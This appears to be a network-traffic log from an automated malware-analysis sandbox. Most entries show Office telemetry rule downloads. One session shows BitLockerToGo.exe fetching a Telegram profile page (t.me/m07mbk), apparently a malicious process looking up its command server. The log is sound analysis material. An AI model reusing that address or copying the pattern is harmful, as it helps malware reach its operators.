                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:41 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        115192.168.2.54982413.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:41 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:41 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:41 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 4847cb37-401e-0016-7fd2-2c53e0000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142541Z-16547b76f7fdtmzhhC1DFW6zhc00000007mg00000000ec55
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:41 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        116192.168.2.54982513.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:41 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:41 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:41 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: fadf1528-a01e-001e-72d2-2c49ef000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142541Z-16547b76f7fr4g8xhC1DFW9cqc0000000hu000000000pruu
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:41 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        117192.168.2.54982613.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:41 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:41 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:41 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 1deecc73-401e-0029-32d2-2c9b43000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142541Z-16547b76f7fcjqqhhC1DFWrrrc0000000kng00000000kay5
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:41 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        118192.168.2.54982713.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:41 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:41 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: e1e647d4-d01e-0028-2386-367896000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142541Z-r178fb8d7656shmjhC1DFWu5kw00000002rg000000004s76
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        119192.168.2.54982813.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:42 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE976026E"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 898deafb-901e-0048-35d2-2cb800000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142542Z-16547b76f7fkcrm9hC1DFWxdag0000000ky00000000058rd
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        120192.168.2.54983013.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:42 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 6266d644-901e-0083-0e09-2cbb55000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142542Z-16547b76f7fj897nhC1DFWdwq40000000km000000000dbgs
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                        121192.168.2.549829149.154.167.994436152C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC85OUTGET /m07mbk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Host: t.me
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:42 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 12292
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: stel_ssid=b303062d2273ada46e_3538011266628302031; expires=Fri, 15 Nov 2024 14:25:42 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                        Cache-control: no-store
                                                                                                                                                                                                                                                                                                                                                        X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC12292INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 30 37 6d 62 6b 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m07mbk</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        122192.168.2.54983113.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:42 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:42 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1425
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: d8b0f8ac-001e-005a-47a7-34c3d0000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142542Z-r178fb8d765z89v7hC1DFW0kvw00000002d000000000kadn
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
